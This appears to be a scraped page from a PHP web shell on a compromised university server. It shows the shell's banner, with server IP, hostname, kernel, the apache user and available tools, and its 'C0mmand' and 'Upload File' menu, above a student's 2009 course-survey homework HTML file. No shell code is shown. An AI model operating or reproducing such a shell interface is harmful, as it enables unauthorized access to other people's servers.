Server IP : 172.16.15.8 / Your IP : 3.15.7.212 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/rlbarner/../tasantos/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- File Name: hw9.html Author: Tara Santos Due Date: April 20, 2009 Class: CS480 Instructor: Dr. Wang Goal: Title page with three links: create the database, insert a record, and display. --> <TITLE>Online Course Survey</TITLE> <font face="impact" size=6 color="2B3856"> <center> <hr color="2B3856">Online Course Survey Homepage<hr color="2B3856"></font> <body background ="http://www.cuttyfruty.com/html/images/fond_d_ecran/back_ground.jpg"> <A HREF ="hw9createdb.php">Create The Database</A><br> <A HREF ="hw9survey.php">Survey Page</A><br> <A HREF ="hw9display.php">Display The Table Contents</A><br> </body>